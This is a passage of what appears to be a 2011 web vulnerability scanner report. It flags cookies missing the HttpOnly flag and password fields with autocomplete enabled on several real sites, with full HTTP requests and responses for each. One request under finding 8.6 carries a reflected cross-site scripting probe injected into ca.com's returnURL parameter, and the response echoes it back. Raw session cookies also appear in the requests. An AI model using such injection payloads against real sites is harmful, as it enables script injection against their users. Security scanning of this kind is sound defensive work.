...[SNIP]...

Response

HTTP/1.1 302 Object Moved
Cache-control: no-store
Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
Content-Length: 0
set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
set-cookie: SMTRYNO=1; path=/; domain=.ca.com


7.16. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...

8. Password field with autocomplete enabled
There are 9 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


8.1. http://webconnect.sendouts.com/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:31:59 GMT
Content-Length: 6707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<body>

<form name="WebForm1" method="post" action="login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&amp;ID=cfs&amp;SiteID=WebConnect&amp;Group=cfs&amp;Key=CN&amp;CnId=" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1">
<div>
...[SNIP]...
<br />
                               <input name="txtPassword" type="password" id="txtPassword" /><span id="RequiredFieldValidator2" class="ErrorMsg" style="color:Red;display:none;">
...[SNIP]...

8.2. https://www.ca.com/us/register/createprofile.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/createprofile.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:47 GMT
Content-Length: 458334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<scri
...[SNIP]...
<body>
<form name="mainForm" method="post" action="/us/register/createprofile.aspx?returnURL=/us/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="txtPsw" type="password" id="txtPsw" maxlength="32" class="small formfieldwidth2 hastip" />
<div class="formtip2 blue small">
...[SNIP]...
<div class="formitemfield">
<input name="txtPswConf" type="password" id="txtPswConf" maxlength="32" class="small formfieldwidth2 hastip" />
<div class="formtip2 small">
...[SNIP]...

8.3. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351389192:ss=1315351389192; bn_u=6923713924586392201

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:48 GMT
Content-Length: 35650


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?returnURL=/us/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.4. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&amp;REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=rs-prod-communities-wa&amp;TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.5. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?returnURL=/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351628610:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==; SMTRYNO=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:27:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:27:11 GMT
Content-Length: 36262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&amp;REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&amp;GUID=0&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&amp;TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.6. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss HTTP/1.1
Host: www.ca.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=22cc2d847a5ef580ca31315351916776:lv=1315351916776:ss=1315351916776

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:35:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:35:48 GMT
Content-Length: 36023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.7. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; SMTRYNO=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:26:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:26:55 GMT
Content-Length: 36448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&amp;REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&amp;GUID=0&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&amp;TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.8. http://www.javalobby.org/articles/acegisecurity/part1.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /articles/acegisecurity/part1.jsp HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:55:34 GMT
Content-Length: 33566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
   <head>

       <title>Securing Your Java Applications - Acegi Security Style</title>
<meta http-equiv="content-type"
...[SNIP]...
<div class="welcomebar">
       
               <form action="/forums/login.jspa" method="post" name="loginform">
               Username/Email: <input type="text" name="username" size="20" maxlength="150" value="" tabindex="1" id="username01" />
               Password: <input type="password" name="password" size="20" maxlength="150" value="" tabindex="2" id="password01" />
               <input type="hidden" name="autoLogin" id="autoLogin01" value="true" />
...[SNIP]...

8.9. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
